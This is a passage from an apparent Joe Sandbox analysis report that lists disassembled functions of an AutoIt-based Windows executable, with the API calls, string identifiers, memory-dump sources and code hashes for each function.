            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$DestroyMove
            • String ID: static
            • API String ID: 2139405536-2160076837
            • Opcode ID: 7ff539629eb4d9b4016cca31e8965d9eb6a91e4917fe86270635fa5e89eb59e0
            • Instruction ID: 007d40ca174831cf89e1d05163074d6095feed375207b3f4ad4943ba4e87d1cc
            • Opcode Fuzzy Hash: 7ff539629eb4d9b4016cca31e8965d9eb6a91e4917fe86270635fa5e89eb59e0
            • Instruction Fuzzy Hash: 5F317071110604AEEB259F68DC80EFB73ADFF88764F00961DF9A5D7280DA35A891D760
            Function 01034537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0103461F
            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01034634
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: '
            • API String ID: 3850602802-1997036262
            • Opcode ID: cb9f47b0909f9b4310fd6fb2b27f82e9d37c80d11914a854f7dc1a7f9cbe7edc
            • Instruction ID: 4d577047159fbbf5849d7b5b7d53f3adbdf6e7255d9cc1107561e0833e641854
            • Opcode Fuzzy Hash: cb9f47b0909f9b4310fd6fb2b27f82e9d37c80d11914a854f7dc1a7f9cbe7edc
            • Instruction Fuzzy Hash: 02310774E01209DFDB14CF69C981BDA7BB9FB49300F14416AE945EB382D771A945CF90
            Function 010331EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0103327C
            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01033287
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: MessageSend
            • String ID: Combobox
            • API String ID: 3850602802-2096851135
            • Opcode ID: 70f401b0f0060bc61f7e220d6477d835dc14e1bf4615ee2f47a7417bb5fc2135
            • Instruction ID: b7b3aa9fcd8e31ed5a9ff6c368152f3c452514a66d0cbb9e8bebfdd1cee15d35
            • Opcode Fuzzy Hash: 70f401b0f0060bc61f7e220d6477d835dc14e1bf4615ee2f47a7417bb5fc2135
            • Instruction Fuzzy Hash: 9611D3713001086FFF629E58DCC0EAB379EEB88364F104229F5549B291D6359C50C760
            Function 01033710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00FA604C
              • Part of subcall function 00FA600E: GetStockObject.GDI32(00000011), ref: 00FA6060
              • Part of subcall function 00FA600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA606A
            • GetWindowRect.USER32(00000000,?), ref: 0103377A
            • GetSysColor.USER32(00000012), ref: 01033794
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Window$ColorCreateMessageObjectRectSendStock
            • String ID: static
            • API String ID: 1983116058-2160076837
            • Opcode ID: c398ba7db32ace89747de5abee0bac03779d95dc6d0b1a019ad948c1ad5afc37
            • Instruction ID: 18afa77f3b69564442906d6852cf553cac42cbcff900d8679e46cccc0dd04773
            • Opcode Fuzzy Hash: c398ba7db32ace89747de5abee0bac03779d95dc6d0b1a019ad948c1ad5afc37
            • Instruction Fuzzy Hash: 58113AB2610209AFEF11DFA8CC45EFA7BF8FB48314F004919F995E6240D739E8509B50
            Function 0101CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
            Download Yara Rule
            APIs
            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0101CD7D
            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0101CDA6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Internet$OpenOption
            • String ID: <local>
            • API String ID: 942729171-4266983199
            • Opcode ID: 178e5d75c174bc8a587472126eecc447ddef148b2ed2b8df3c8a263492d3e1a8
            • Instruction ID: 85072a42dc4f015fc2537977f5b2e9292264aba62e0970d19851122ac0da719a
            • Opcode Fuzzy Hash: 178e5d75c174bc8a587472126eecc447ddef148b2ed2b8df3c8a263492d3e1a8
            • Instruction Fuzzy Hash: 561129712816317AF7755A668D44FF7BEACEF026A4F80425AF189D3084D378D440C6F0
            Function 01033429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
            Download Yara Rule
            APIs
            • GetWindowTextLengthW.USER32(00000000), ref: 010334AB
            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010334BA
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LengthMessageSendTextWindow
            • String ID: edit
            • API String ID: 2978978980-2167791130
            • Opcode ID: 7bba42561e21b28337aa278eeab29ec67a5577d968a4bb13fc83c5f8374a963c
            • Instruction ID: 62efbdba790ddf7fd30ee2ccab33998558780ea76dc0396e8a10b94fb394d7bd
            • Opcode Fuzzy Hash: 7bba42561e21b28337aa278eeab29ec67a5577d968a4bb13fc83c5f8374a963c
            • Instruction Fuzzy Hash: F811BF75100108ABEB624F68DC84AEB37AEFB85374F504324F9A0EB1D4CB35EC919750
            Function 01006C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
            • CharUpperBuffW.USER32(?,?,?), ref: 01006CB6
            • _wcslen.LIBCMT ref: 01006CC2
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen$BuffCharUpper
            • String ID: STOP
            • API String ID: 1256254125-2411985666
            • Opcode ID: 2a3fe9cf95ef07e7c546861cf321b9fdf3f29578eb4da002547186034cff4247
            • Instruction ID: 4dca80114d3a6dd7fdc10e35498f830d9c46efeffcd1d2f5ae1698d499b9620a
            • Opcode Fuzzy Hash: 2a3fe9cf95ef07e7c546861cf321b9fdf3f29578eb4da002547186034cff4247
            • Instruction Fuzzy Hash: 3F010432D0052B8BEB22AFBDDC80DBF37E6EA51610F000579E892961C1EB37D460C650
            Function 01001BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 01003CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01003CCA
            • SendMessageW.USER32(?,00000180,00000000,?), ref: 01001C46
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClassMessageNameSend_wcslen
            • String ID: ComboBox$ListBox
            • API String ID: 624084870-1403004172
            • Opcode ID: cc61763d604658ee4931b70d58aac9aac065317816f79a7875412101ea7b0f6d
            • Instruction ID: 780933cd2cbfab8982994bb1df006fa767375e9e235a4af6daf1bc04aa5d9a95
            • Opcode Fuzzy Hash: cc61763d604658ee4931b70d58aac9aac065317816f79a7875412101ea7b0f6d
            • Instruction Fuzzy Hash: 3101F7B164011D6BEB0AEB90CE51DFF77EC9B12380F000029A586672C1EA74EA4897B1
            Function 01001C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 01003CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01003CCA
            • SendMessageW.USER32(?,00000182,?,00000000), ref: 01001CC8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClassMessageNameSend_wcslen
            • String ID: ComboBox$ListBox
            • API String ID: 624084870-1403004172
            • Opcode ID: cb7b7c39de4b905ee78bd5b3cfd17a57f50dedba3989d5496379673a40f4ec4f
            • Instruction ID: ed34903b05fc3718b86af2a44b31eb9744178b0a398fb8f4cfcd4613f597d878
            • Opcode Fuzzy Hash: cb7b7c39de4b905ee78bd5b3cfd17a57f50dedba3989d5496379673a40f4ec4f
            • Instruction Fuzzy Hash: 4A01A7B164011D67EB16E795CE11EFE77EC9B12380F540025A881A72C1EA75DA089671
            Function 01001D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FA9CB3: _wcslen.LIBCMT ref: 00FA9CBD
              • Part of subcall function 01003CA7: GetClassNameW.USER32(?,?,000000FF), ref: 01003CCA
            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 01001DD3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ClassMessageNameSend_wcslen
            • String ID: ComboBox$ListBox
            • API String ID: 624084870-1403004172
            • Opcode ID: 51685a4d17c763f3b78b0ce647784e3e296c18c6c3a92b3be82f2ad5fdc0b5e4
            • Instruction ID: a64c77b5a3f93db98286f1e049bcc68f65db007c1588f8fcb61c505af8b50162
            • Opcode Fuzzy Hash: 51685a4d17c763f3b78b0ce647784e3e296c18c6c3a92b3be82f2ad5fdc0b5e4
            • Instruction Fuzzy Hash: C6F0F971A4022966E705F7A4CC51EFF77ACAB02390F44091AB4A2A72C1DA7495088661
            Function 0102747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: _wcslen
            • String ID: 3, 3, 16, 1
            • API String ID: 176396367-3042988571
            • Opcode ID: 3501db1f8767f8991e9b47fe8249ee26e75d26299e9f7ae377e1f4eba24a2f4a
            • Instruction ID: dbba963ae8d8c3aaf5cb14b9f5187037739344b62b9334545dbcd63e909f4c6c
            • Opcode Fuzzy Hash: 3501db1f8767f8991e9b47fe8249ee26e75d26299e9f7ae377e1f4eba24a2f4a
            • Instruction Fuzzy Hash: 93E02B02601231109271127E9DC2EBF7AC9CFD5650710182FFAC1C2266EFA8DD9193A0
            Function 01000B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
            Download Yara Rule
            APIs
            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 01000B23
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Message
            • String ID: AutoIt$Error allocating memory.
            • API String ID: 2030045667-4017498283
            • Opcode ID: 631d09cf3f9ce11337726f51943408a4233293ebcbe5235e34b2e1618a32c411
            • Instruction ID: 754864ace8222d57245411058d63cb41156d5624465e4149774b387da3d12a6d
            • Opcode Fuzzy Hash: 631d09cf3f9ce11337726f51943408a4233293ebcbe5235e34b2e1618a32c411
            • Instruction Fuzzy Hash: 5BE0D83124431836E11436557D03FC97A888F05B51F10042BFBD4E94C38ADA645016A9
            Function 00FC0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
            Download Yara Rule
            APIs
              • Part of subcall function 00FBF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00FC0D71,?,?,?,00FA100A), ref: 00FBF7CE
            • IsDebuggerPresent.KERNEL32(?,?,?,00FA100A), ref: 00FC0D75
            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00FA100A), ref: 00FC0D84
            Strings
            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00FC0D7F
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
            • API String ID: 55579361-631824599
            • Opcode ID: b979954fceaaba7d14944f75518f2c0590bf272eb2a874390c7cafc329b58429
            • Instruction ID: 49bba7fc267f806e4c5683d5e23dde69392a15f72a970e919984f4d4906cc1a6
            • Opcode Fuzzy Hash: b979954fceaaba7d14944f75518f2c0590bf272eb2a874390c7cafc329b58429
            • Instruction Fuzzy Hash: EDE092746003528BE3309FB9E605B427BE8AF00B44F00896EE8C7D7645DFB9E4499BA1
            Function 00FFD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LocalTime
            • String ID: %.3d$X64
            • API String ID: 481472006-1077770165
            • Opcode ID: 3a4db132c852887733a0a7f5434380be06dd9505f356a5ee49961a83f9e62af1
            • Instruction ID: b994620ce3e5a718cf61c3625e1188e958367458fb0169a9af4a9b518e27c79a
            • Opcode Fuzzy Hash: 3a4db132c852887733a0a7f5434380be06dd9505f356a5ee49961a83f9e62af1
            • Instruction Fuzzy Hash: 52D0127280411DE9CB50A6D1CC45AF9B37DAF09341F508452FA06E1010E628C5087BA2
            Function 01032322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
            Download Yara Rule
            APIs
            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0103232C
            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0103233F
              • Part of subcall function 0100E97B: Sleep.KERNEL32 ref: 0100E9F3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FindMessagePostSleepWindow
            • String ID: Shell_TrayWnd
            • API String ID: 529655941-2988720461
            • Opcode ID: 9e7aaee6785f590316b630a8ad4d859b0049abcf0cb9cefe606191d84ec0dac0
            • Instruction ID: f61d819e3be94f23a1dfd94b9eddb73a33f253d91d532fe47b72869b19b9cd45
            • Opcode Fuzzy Hash: 9e7aaee6785f590316b630a8ad4d859b0049abcf0cb9cefe606191d84ec0dac0
            • Instruction Fuzzy Hash: 85D0C936394310B6F674A671DD0EFC67A18AB14B10F00491676C5FA1C4D9BAA8419B54
            Function 01032356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
            Download Yara Rule
            APIs
            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0103236C
            • PostMessageW.USER32(00000000), ref: 01032373
              • Part of subcall function 0100E97B: Sleep.KERNEL32 ref: 0100E9F3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FindMessagePostSleepWindow
            • String ID: Shell_TrayWnd
            • API String ID: 529655941-2988720461
            • Opcode ID: 29c0acdee742bed6c32db6cde39c941c74b610e512f45d34dadb68ddecb40047
            • Instruction ID: c954c8032072871ed496fff62ec7a78d4b013096421841142d7edb2d5b1de389
            • Opcode Fuzzy Hash: 29c0acdee742bed6c32db6cde39c941c74b610e512f45d34dadb68ddecb40047
            • Instruction Fuzzy Hash: 4AD0C9323953107AF674A671DD0EFC67618AB15B10F00491676C5FA1C4D9BAA8419B54
            Function 00FDBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
            Download Yara Rule
            APIs
            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00FDBE93
            • GetLastError.KERNEL32 ref: 00FDBEA1
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00FDBEFC
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ByteCharMultiWide$ErrorLast
            • String ID:
            • API String ID: 1717984340-0
            • Opcode ID: 2aebfdc736b5c93422de58d18da1a5c6c5755423e08fb0542c0eb8ea953143c9
            • Instruction ID: 907908d80b064ade66a0c951c2bf11dac65ea5d9f461ca8b01a5b5e4fe7c47d5
            • Opcode Fuzzy Hash: 2aebfdc736b5c93422de58d18da1a5c6c5755423e08fb0542c0eb8ea953143c9
            • Instruction Fuzzy Hash: E041E935A04246EFDF218FA5CC44BBA7BA6DF41320F1A415AF95997391DB318D00FB60